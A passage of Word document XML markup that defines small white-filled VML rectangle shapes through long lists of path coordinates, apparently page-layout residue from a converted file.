123,2700,5123,2699,5123,2698,5123,2697,5123,2696,5123,2695,5123,2694,5123,2693,5123,2691,5123,2690,5123,2689,5123,2688,5123,2686,5123,2685,5123,2684,5123,2682,5123,2681,5123,2679,5123,2678,5123,2676,5123,2675,5123,2673,5123,2671,5123,2670,5123,2668,5123,2666,5123,2664,5123,2663,5123,2661,5123,2659,5123,2657,5123,2655,5123,2653,5123,2651,5123,2649,5123,2647,5123,2644,5123,2642,5123,2640,5123,2638,5123,2635,5123,2633,5123,2631,5123,2628,5123,2626,5123,2623,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5122,2620,5122,2620,5122,2620,5122,2620,5122,2620,5122,2620,5122,2620,5121,2620,5121,2620,5121,2620,5121,2620,5120,2620,5120,2620,5120,2620,5119,2620,5119,2620,5118,2620,5118,2620,5117,2620,5117,2620,5116,2620,5116,2620,5115,2620,5115,2620,5114,2620,5113,2620,5113,2620,5112,2620,5111,2620,5110,2620,5110,2620,5109,2620,5108,2620,5107,2620,5106,2620,5105,2620,5104,2620,5103,2620,5101,2620,5100,2620,5099,2620,5098,2620,5096,2620,5095,2620,5093,2620,5092,2620,5090,2620,5089,2620,5087,2620,5085,2620,5084,2620,5082,2620,5080,2620,5078,2620,5076,2620,5074,2620,5072,2620,5070,2620,5068,2620,5066,2620,5063,2620,5061,2620,5059,2620,5056,2620,5054,2620,5051,2620,5048,2620,5046,2620,5043,2620,5040,2620,5037,2620,5034,2620,5031,2620,5028,2620,5025,2620,5021,2620,5018,2620,5014,2620,5011,2620,5007,2620,5004,2620,5000,2620,4996,2620,4992,2620,4988,2620,4984,2620,4980,2620,4976,2620,4972,2620,4967,2620,4963,2620,4958,2620,4954,2620,4949,2620,4944,2620,4939,2620,4934,2620,4929,2620,4924,2620,4919,2620,4914,2620,4908,2620,4903e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:271.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,5430" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:5430;width:110;height:230" coordorigin="2190,5430" coordsize="110,230" path="m2205,5447l2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2207,5447,2207,5447,2207,5447,2207,5447,2207,5447,2207,5447,2207,5447,2208,5447,2208,5447,2208,5447,2208,5447,2209,5447,2209,5447,2209,5447,2209,5447,2210,5447,2210,5447,2210,5447,2211,5447,2211,5447,2211,5447,2212,5447,2212,5447,2213,5447,2213,5447,2214,5447,2214,5447,2215,5447,2215,5447,2216,5447,2216,5447,2217,5447,2217,5447,2218,5447,2219,5447,2219,5447,2220,5447,2221,5447,2222,5447,2222,5447,2223,5447,2224,5447,2225,5447,2226,5447,2227,5447,2227,5447,2228,5447,2229,5447,2230,5447,2231,5447,2232,5447,2234,5447,2235,5447,2236,5447,2237,5447,2238,5447,2239,5447,2241,5447,2242,5447,2243,5447,2245,5447,2246,5447,2247,5447,2249,5447,2250,5447,2252,5447,2253,5447,2255,5447,2257,5447,2258,5447,2260,5447,2262,5447,2263,5447,2265,5447,2267,5447,2269,5447,2271,5447,2273,5447,2275,5447,2277,5447,2279,5447,2281,5447,2283,5447,2285,5447,2287,5447,2290,5447,2292,5447,2294,5447,2297,5447,2299,5447,2302,5447,2304,5447,2307,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5449,2309,5449,2309,5449,2309,5449,2309,5450,2309,5450,2309,5450,2309,5450,2309,5451,2309,5451,2309,5452,2309,5452,2309,5452,2309,5453,2309,5453,2309,5454,2309,5454,2309,5455,2309,5456,2309,5456,2309,5457,2309,5458,2309,5458,2309,5459,2309,5460,2309,5461,2309,5462,2309,5463,2309,5464,2309,5465,2309,5466,2309,5467,2309,5468,2309,5469,2309,5470,2309,5472,2309,5473,2309,5474,2309,5476,2309,5477,2309,5478,2309,5480,2309,5482,2309,5483,2309,5485,2309,5487,2309,5488,2309,5490,2309,5492,2309,5494,2309,5496,2309,5498,2309,5500,2309,5502,2309,5505,2309,5507,2309,5509,2309,5512,2309,5514,2309,5517,2309,5519,2309,5522,2309,5525,2309,5528,2309,5530,2309,5533,2309,5536,2309,5540,2309,5543,2309,5546,2309,5549,2309,5553,2309,5556,2309,5559,2309,5563,2309,5567,2309,5570,2309,5574,2309,5578,2309,5582,2309,5586,2309,5590,2309,5594,2309,5599,2309,5603,2309,5608,2309,5612,2309,5617,2309,5621,2309,5626,2309,5631,2309,5636,2309,5641,2309,5646,2309,5651,2309,5657,2309,5662,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2307,5668,2307,5668,2307,5668,2307,5668,2307,5668,2306,5668,2306,5668,2306,5668,2306,5668,2305,5668,2305,5668,2305,5668,2304,5668,2304,5668,2304,5668,2303,5668,2303,5668,2302,5668,2302,5668,2302,5668,2301,5668,2301,5668,2300,5668,2300,5668,2299,5668,2298,5668,2298,5668,2297,5668,2297,5668,2296,5668,2295,5668,2295,5668,2294,5668,2293,5668,2292,5668,2292,5668,2291,5668,2290,5668,2289,5668,2288,5668,2287,5668,2286,5668,2285,5668,2284,5668,2283,5668,2282,5668,2281,5668,2280,5668,2279,5668,2278,5668,2276,5668,2275,5668,2274,5668,2273,5668,2271,5668,2270,5668,2269,5668,2267,5668,2266,5668,2264,5668,2263,5668,2261,5668,2260,5668,2258,5668,2256,5668,2255,5668,2253,5668,2251,5668,2249,5668,2248,5668,2246,5668,2244,5668,2242,5668,2240,5668,2238,5668,2236,5668,2234,5668,2232,5668,2229,5668,2227,5668,2225,5668,2223,5668,2220,5668,2218,5668,2216,5668,2213,5668,2211,5668,2208,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5666,2205,5666,2205,5666,2205,5666,2205,5665,2205,5665,2205,5665,2205,5665,2205,5664,2205,5664,2205,5663,2205,5663,2205,5663,2205,5662,2205,5662,2205,5661,2205,5661,2205,5660,2205,5659,2205,5659,2205,5658,2205,5657,2205,5657,2205,5656,2205,5655,2205,5654,2205,5653,2205,5652,2205,5651,2205,5650,2205,5649,2205,5648,2205,5647,2205,5646,2205,5645,2205,5644,2205,5642,2205,5641,2205,5639,2205,5638,2205,5637,2205,5635,2205,5633,2205,5632,2205,5630,2205,5628,2205,5627,2205,5625,2205,5623,2205,5621,2205,5619,2205,5617,2205,5615,2205,5613,2205,5610,2205,5608,2205,5606,2205,5603,2205,5601,2205,5598,2205,5596,2205,5593,2205,5590,2205,5587,2205,5585,2205,5582,2205,5579,2205,5576,2205,5572,2205,5569,2205,5566,2205,5563,2205,5559,2205,5556,2205,5552,2205,5548,2205,5545,2205,5541,2205,5537,2205,5533,2205,5529,2205,5525,2205,5521,2205,5516,2205,5512,2205,5507,2205,5503,2205,5498,2205,5494,2205,5489,2205,5484,2205,5479,2205,5474,2205,5469,2205,5464,2205,5458,2205,5453,2205,5447e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:271.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,5430" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:5430;width:110;height:230" coordorigin="2610,5430" coordsize="110,230" path="m2620,5447l2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2622,5447,2622,5447,2622,5447,2622,5447,2622,5447,2622,5447,2623,5447,2623,5447,2623,5447,2623,5447,2624,5447,2624,5447,2624,5447,2624,5447,2625,5447,2625,5447,2625,5447,2626,5447,2626,5447,2626,5447,2627,5447,2627,5447,2628,5447,2628,5447,2629,5447,2629,5447,2630,5447,2630,5447,2631,5447,2631,5447,2632,5447,2632,5447,2633,5447,2634,5447,2634,5447,2635,5447,2636,5447,2637,5447,2637,5447,2638,5447,2639,5447,2640,5447,2641,5447,2642,5447,2642,5447,2643,5447,2644,5447,2645,5447,2646,5447,2647,5447,2649,5447,2650,5447,2651,5447,2652,5447,2653,5447,2654,5447,2656,5447,2657,5447,2658,5447,2660,5447,2661,5447,2662,5447,2664,5447,2665,5447,2667,5447,2668,5447,2670,5447,2672,5447,2673,5447,2675,5447,2677,5447,2678,5447,2680,5447,2682,5447,2684,5447,2686,5447,2688,5447,2690,5447,2692,5447,2694,5447,2696,5447,2698,5447,2700,5447,2702,5447,2705,5447,2707,5447,2709,5447,2712,5447,2714,5447,2717,5447,2719,5447,2722,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5449,2724,5449,2724,5449,2724,5449,2724,5450,2724,5450,2724,5450,2724,5450,2724,5451,2724,5451,2724,5452,2724,5452,2724,5452,2724,5453,2724,5453,2724,5454,2724,5454,2724,5455,2724,5456,2724,5456,2724,5457,2724,5458,2724,5458,2724,5459,2724,5460,2724,5461,2724,5462,2724,5463,2724,5464,2724,5465,2724,5466,2724,5467,2724,5468,2724,5469,2724,5470,2724,5472,2724,5473,2724,5474,2724,5476,2724,5477,2724,5478,2724,5480,2724,5482,2724,5483,2724,5485,2724,5487,2724,5488,2724,5490,2724,5492,2724,5494,2724,5496,2724,5498,2724,5500,2724,5502,2724,5505,2724,5507,2724,5509,2724,5512,2724,5514,2724,5517,2724,5519,2724,5522,2724,5525,2724,5528,2724,5530,2724,5533,2724,5536,2724,5540,2724,5543,2724,5546,2724,5549,2724,5553,2724,5556,2724,5559,2724,5563,2724,5567,2724,5570,2724,5574,2724,5578,2724,5582,2724,5586,2724,5590,2724,5594,2724,5599,2724,5603,2724,5608,2724,5612,2724,5617,2724,5621,2724,5626,2724,5631,2724,5636,2724,5641,2724,5646,2724,5651,2724,5657,2724,5662,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2723,5668,2723,5668,2723,5668,2723,5668,2723,5668,2723,5668,2723,5668,2722,5668,2722,5668,2722,5668,2722,5668,2722,5668,2722,5668,2721,5668,2721,5668,2721,5668,2721,5668,2720,5668,2720,5668,2720,5668,2719,5668,2719,5668,2719,5668,2718,5668,2718,5668,2717,5668,2717,5668,2716,5668,2716,5668,2716,5668,2715,5668,2714,5668,2714,5668,2713,5668,2713,5668,2712,5668,2712,5668,2711,5668,2710,5668,2709,5668,2709,5668,2708,5668,2707,5668,2706,5668,2706,5668,2705,5668,2704,5668,2703,5668,2702,5668,2701,5668,2700,5668,2699,5668,2698,5668,2697,5668,2696,5668,2695,5668,2694,5668,2693,5668,2691,5668,2690,5668,2689,5668,2688,5668,2686,5668,2685,5668,2684,5668,2682,5668,2681,5668,2679,5668,2678,5668,2676,5668,2675,5668,2673,5668,2671,5668,2670,5668,2668,5668,2666,5668,2664,5668,2663,5668,2661,5668,2659,5668,2657,5668,2655,5668,2653,5668,2651,5668,2649,5668,2647,5668,2644,5668,2642,5668,2640,5668,2638,5668,2635,5668,2633,5668,2631,5668,2628,5668,2626,5668,2623,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5666,2620,5666,2620,5666,2620,5666,2620,5665,2620,5665,2620,5665,2620,5665,2620,5664,2620,5664,2620,5663,2620,5663,2620,5663,2620,5662,2620,5662,2620,5661,2620,5661,2620,5660,2620,5659,2620,5659,2620,5658,2620,5657,2620,5657,2620,5656,2620,5655,2620,5654,2620,5653,2620,5652,2620,5651,2620,5650,2620,5649,2620,5648,2620,5647,2620,5646,2620,5645,2620,5644,2620,5642,2620,5641,2620,5639,2620,5638,2620,5637,2620,5635,2620,5633,2620,5632,2620,5630,2620,5628,2620,5627,2620,5625,2620,5623,2620,5621,2620,5619,2620,5617,2620,5615,2620,5613,2620,5610,2620,5608,2620,5606,2620,5603,2620,5601,2620,5598,2620,5596,2620,5593,2620,5590,2620,5587,2620,5585,2620,5582,2620,5579,2620,5576,2620,5572,2620,5569,2620,5566,2620,5563,2620,5559,2620,5556,2620,5552,2620,5548,2620,5545,2620,5541,2620,5537,2620,5533,2620,5529,2620,5525,2620,5521,2620,5516,2620,5512,2620,5507,2620,5503,2620,5498,2620,5494,2620,5489,2620,5484,2620,5479,2620,5474,2620,5469,2620,5464,2620,5458,2620,5453,2620,5447e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:299.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,5990" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:5990;width:110;height:230" coordorigin="2190,5990" coordsize="110,230" path="m2205,6005l2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2207,6005,2207,6005,2207,6005,2207,6005,2207,6005,2207,6005,2207,6005,2208,6005,2208,6005,2208,6005,2208,6005,2209,6005,2209,6005,2209,6005,2209,6005,2210,6005,2210,6005,2210,6005,2211,6005,2211,6005,2211,6005,2212,6005,2212,6005,2213,6005,2213,6005,2214,6005,2214,6005,2215,6005,2215,6005,2216,6005,2216,6005,2217,6005,2217,6005,2218,6005,2219,6005,2219,6005,2220,6005,2221,6005,2222,6005,2222,6005,2223,6005,2224,6005,2225,6005,2226,6005,2227,6005,2227,6005,2228,6005,2229,6005,2230,6005,2231,6005,2232,6005,2234,6005,2235,6005,2236,6005,2237,6005,2238,6005,2239,6005,2241,6005,2242,6005,2243,6005,2245,6005,2246,6005,2247,6005,2249,6005,2250,6005,2252,6005,2253,6005,2255,6005,2257,6005,2258,6005,2260,6005,2262,6005,2263,6005,2265,6005,2267,6005,2269,6005,2271,6005,2273,6005,2275,6005,2277,6005,2279,6005,2281,6005,2283,6005,2285,6005,2287,6005,2290,6005,2292,6005,2294,6005,2297,6005,2299,6005,2302,6005,2304,6005,2307,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6006,2309,6006,2309,6006,2309,6006,2309,6006,2309,6006,2309,6006,2309,6007,2309,6007,2309,6007,2309,6007,2309,6008,2309,6008,2309,6008,2309,6009,2309,6009,2309,6010,2309,6010,2309,6010,2309,6011,2309,6012,2309,6012,2309,6013,2309,6013,2309,6014,2309,6015,2309,6015,2309,6016,2309,6017,2309,6018,2309,6018,2309,6019,2309,6020,2309,6021,2309,6022,2309,6023,2309,6024,2309,6025,2309,6027,2309,6028,2309,6029,2309,6030,2309,6032,2309,6033,2309,6035,2309,6036,2309,6038,2309,6039,2309,6041,2309,6042,2309,6044,2309,6046,2309,6048,2309,6050,2309,6052,2309,6054,2309,6056,2309,6058,2309,6060,2309,6062,2309,6065,2309,6067,2309,6069,2309,6072,2309,6074,2309,6077,2309,6080,2309,6082,2309,6085,2309,6088,2309,6091,2309,6094,2309,6097,2309,6100,2309,6103,2309,6107,2309,6110,2309,6114,2309,6117,2309,6121,2309,6124,2309,6128,2309,6132,2309,6136,2309,6140,2309,6144,2309,6148,2309,6152,2309,6156,2309,6161,2309,6165,2309,6170,2309,6174,2309,6179,2309,6184,2309,6189,2309,6194,2309,6199,2309,6204,2309,6209,2309,6214,2309,6220,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2307,6225,2307,6225,2307,6225,2307,6225,2307,6225,2306,6225,2306,6225,2306,6225,2306,6225,2305,6225,2305,6225,2305,6225,2304,6225,2304,6225,2304,6225,2303,6225,2303,6225,2302,6225,2302,6225,2302,6225,2301,6225,2301,6225,2300,6225,2300,6225,2299,6225,2298,6225,2298,6225,2297,6225,2297,6225,2296,6225,2295,6225,2295,6225,2294,6225,2293,6225,2292,6225,2292,6225,2291,6225,2290,6225,2289,6225,2288,6225,2287,6225,2286,6225,2285,6225,2284,6225,2283,6225,2282,6225,2281,6225,2280,6225,2279,6225,2278,6225,2276,6225,2275,6225,2274,6225,2273,6225,2271,6225,2270,6225,2269,6225,2267,6225,2266,6225,2264,6225,2263,6225,2261,6225,2260,6225,2258,6225,2256,6225,2255,6225,2253,6225,2251,6225,2249,6225,2248,6225,2246,6225,2244,6225,2242,6225,2240,6225,2238,6225,2236,6225,2234,6225,2232,6225,2229,6225,2227,6225,2225,6225,2223,6225,2220,6225,2218,6225,2216,6225,2213,6225,2211,6225,2208,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6224,2205,6224,2205,6224,2205,6224,2205,6224,2205,6224,2205,6223,2205,6223,2205,6223,2205,6222,2205,6222,2205,6222,2205,6221,2205,6221,2205,6221,2205,6220,2205,6220,2205,6219,2205,6219,2205,6218,2205,6218,2205,6217,2205,6216,2205,6216,2205,6215,2205,6214,2205,6213,2205,6213,2205,6212,2205,6211,2205,6210,2205,6209,2205,6208,2205,6207,2205,6206,2205,6205,2205,6204,2205,6202,2205,6201,2205,6200,2205,6198,2205,6197,2205,6196,2205,6194,2205,6193,2205,6191,2205,6189,2205,6188,2205,6186,2205,6184,2205,6182,2205,6180,2205,6179,2205,6176,2205,6174,2205,6172,2205,6170,2205,6168,2205,6166,2205,6163,2205,6161,2205,6158,2205,6156,2205,6153,2205,6151,2205,6148,2205,6145,2205,6142,2205,6139,2205,6136,2205,6133,2205,6130,2205,6127,2205,6123,2205,6120,2205,6117,2205,6113,2205,6110,2205,6106,2205,6102,2205,6098,2205,6095,2205,6091,2205,6087,2205,6082,2205,6078,2205,6074,2205,6070,2205,6065,2205,6061,2205,6056,2205,6051,2205,6046,2205,6042,2205,6037,2205,6032,2205,6026,2205,6021,2205,6016,2205,6010,2205,6005e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:299.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,5990" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:5990;width:110;height:230" coordorigin="2610,5990" coordsize="110,230" path="m2620,6005l2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2622,6005,2622,6005,2622,6005,2622,6005,2622,6005,2622,6005,2623,6005,2623,6005,2623,6005,2623,6005,2624,6005,2624,6005,2624,6005,2624,6005,2625,6005,2625,6005,2625,6005,2626,6005,2626,6005,2626,6005,2627,6005,2627,6005,2628,6005,2628,6005,2629,6005,2629,6005,2630,6005,2630,6005,2631,6005,2631,6005,2632,6005,2632,6005,2633,6005,2634,6005,2634,6005,2635,6005,2636,6005,2637,6005,2637,6005,2638,6005,2639,6005,2640,6005,2641,6005,2642,6005,2642,6005,2643,6005,2644,6005,2645,6005,2646,6005,2647,6005,2649,6005,2650,6005,2651,6005,2652,6005,2653,6005,2654,6005,2656,6005,2657,6005,2658,6005,2660,6005,2661,6005,2662,6005,2664,6005,2665,6005,2667,6005,2668,6005,2670,6005,2672,6005,2673,6005,2675,6005,2677,6005,2678,6005,2680,6005,2682,6005,2684,6005,2686,6005,2688,6005,2690,6005,2692,6005,2694,6005,2696,6005,2698,6005,2700,6005,2702,6005,2705,6005,2707,6005,2709,6005,2712,6005,2714,6005,2717,6005,2719,6005,2722,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6005,2724,6006,2724,6006,2724,6006,2724,6006,2724,6006,2724,6006,2724,6006,2724,6007,2724,6007,2724,6007,2724,6007,2724,6008,2724,6008,2724,6008,2724,6009,2724,6009,2724,6010,2724,6010,2724,6010,2724,6011,2724,6012,2724,6012,2724,6013,2724,6013,2724,6014,2724,6015,2724,6015,2724,6016,2724,6017,2724,6018,2724,6018,2724,6019,2724,6020,2724,6021,2724,6022,2724,6023,2724,6024,2724,6025,2724,6027,2724,6028,2724,6029,2724,6030,2724,6032,2724,6033,2724,6035,2724,6036,2724,6038,2724,6039,2724,6041,2724,6042,2724,6044,2724,6046,2724,6048,2724,6050,2724,6052,2724,6054,2724,6056,2724,6058,2724,6060,2724,6062,2724,6065,2724,6067,2724,6069,2724,6072,2724,6074,2724,6077,2724,6080,2724,6082,2724,6085,2724,6088,2724,6091,2724,6094,2724,6097,2724,6100,2724,6103,2724,6107,2724,6110,2724,6114,2724,6117,2724,6121,2724,6124,2724,6128,2724,6132,2724,6136,2724,6140,2724,6144,2724,6148,2724,6152,2724,6156,2724,6161,2724,6165,2724,6170,2724,6174,2724,6179,2724,6184,2724,6189,2724,6194,2724,6199,2724,6204,2724,6209,2724,6214,2724,6220,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2724,6225,2723,6225,2723,6225,2723,6225,2723,6225,2723,6225,2723,6225,2723,6225,2722,6225,2722,6225,2722,6225,2722,6225,2722,6225,2722,6225,2721,6225,2721,6225,2721,6225,2721,6225,2720,6225,2720,6225,2720,6225,2719,6225,2719,6225,2719,6225,2718,6225,2718,6225,2717,6225,2717,6225,2716,6225,2716,6225,2716,6225,2715,6225,2714,6225,2714,6225,2713,6225,2713,6225,2712,6225,2712,6225,2711,6225,2710,6225,2709,6225,2709,6225,2708,6225,2707,6225,2706,6225,2706,6225,2705,6225,2704,6225,2703,6225,2702,6225,2701,6225,2700,6225,2699,6225,2698,6225,2697,6225,2696,6225,2695,6225,2694,6225,2693,6225,2691,6225,2690,6225,2689,6225,2688,6225,2686,6225,2685,6225,2684,6225,2682,6225,2681,6225,2679,6225,2678,6225,2676,6225,2675,6225,2673,6225,2671,6225,2670,6225,2668,6225,2666,6225,2664,6225,2663,6225,2661,6225,2659,6225,2657,6225,2655,6225,2653,6225,2651,6225,2649,6225,2647,6225,2644,6225,2642,6225,2640,6225,2638,6225,2635,6225,2633,6225,2631,6225,2628,6225,2626,6225,2623,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6225,2620,6224,2620,6224,2620,6224,2620,6224,2620,6224,2620,6224,2620,6223,2620,6223,2620,6223,2620,6222,2620,6222,2620,6222,2620,6221,2620,6221,2620,6221,2620,6220,2620,6220,2620,6219,2620,6219,2620,6218,2620,6218,2620,6217,2620,6216,2620,6216,2620,6215,2620,6214,2620,6213,2620,6213,2620,6212,2620,6211,2620,6210,2620,6209,2620,6208,2620,6207,2620,6206,2620,6205,2620,6204,2620,6202,2620,6201,2620,6200,2620,6198,2620,6197,2620,6196,2620,6194,2620,6193,2620,6191,2620,6189,2620,6188,2620,6186,2620,6184,2620,6182,2620,6180,2620,6179,2620,6176,2620,6174,2620,6172,2620,6170,2620,6168,2620,6166,2620,6163,2620,6161,2620,6158,2620,6156,2620,6153,2620,6151,2620,6148,2620,6145,2620,6142,2620,6139,2620,6136,2620,6133,2620,6130,2620,6127,2620,6123,2620,6120,2620,6117,2620,6113,2620,6110,2620,6106,2620,6102,2620,6098,2620,6095,2620,6091,2620,6087,2620,6082,2620,6078,2620,6074,2620,6070,2620,6065,2620,6061,2620,6056,2620,6051,2620,6046,2620,6042,2620,6037,2620,6032,2620,6026,2620,6021,2620,6016,2620,6010,2620,6005e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:326.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,6530" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:6530;width:110;height:230" coordorigin="2190,6530" coordsize="110,230" path="m2205,6550l2205,6550,2205,6550,2205,6550,2205,6550,2205,6550,2205,6550,2205,6550,2205,6550,2205,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2206,6550,2207,6550,2207,6550,2207,6550,2207,6550,2207,6550,2207,6550,2207,6550,2208,6550,2208,6550,2208,6550,2208,6550,2209,6550,2209,6550,2209,6550,2209,6550,2210,6550,2210,6550,2210,6550,2211,6550,2211,6550,2211,6550,2212,6550,2212,6550,2213,6550,2213,6550,2214,6550,2214,6550,2215,6550,2215,6550,2216,6550,2216,6550,2217,6550,2217,6550,2218,6550,2219,6550,2219,6550,2220,6550,2221,6550,2222,6550,2222,6550,2223,6550,2224,6550,2225,6550,2226,6550,2227,6550,2227,6550,2228,6550,2229,6550,2230,6550,2231,6550,2232,6550,2234,6550,2235,6550,2236,6550,2237,6550,2238,6550,2239,6550,2241,6550,2242,6550,2243,6550,2245,6550,2246,6550,2247,6550,2249,6550,2250,6550,2252,6550,2253,6550,2255,6550,2257,6550,2258,6550,2260,6550,2262,6550,2263,6550,2265,6550,2267,6550,2269,6550,2271,6550,2273,6550,2275,6550,2277,6550,2279,6550,2281,6550,2283,6550,2285,6550,2287,6550,2290,6550,2292,6550,2294,6550,2297,6550,2299,6550,2302,6550,2304,6550,2307,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6550,2309,6551,2309,6551,2309,6551,2309,6551,2309,6551,2309,6552,2309,6552,2309,6552,2309,6552,2309,6553,2309,6553,2309,6553,2309,6554,2309,6554,2309,6555,2309,6555,2309,6556,2309,6556,2309,6557,2309,6557,2309,6558,2309,6559,2309,6559,2309,6560,2309,6561,2309,6561,2309,6562,2309,6563,2309,6564,2309,6565,2309,6566,2309,6567,2309,6568,2309,6569,2309,6570,2309,6571,2309,6572,2309,6574,2309,6575,2309,6576,2309,6578,2309,6579,2309,6581,2309,6582,2309,6584,2309,6585,2309,6587,2309,6589,2309,6591,2309,6592,2309,6594,2309,6596,2309,6598,2309,6600,2309,6603,2309,6605,2309,6607,2309,6609,2309,6612,2309,6614,2309,6616,2309,6619,2309,6622,2309,6624,2309,6627,2309,6630,2309,6633,2309,6636,2309,6639,2309,6642,2309,6645,2309,6648,2309,6651,2309,6655,2309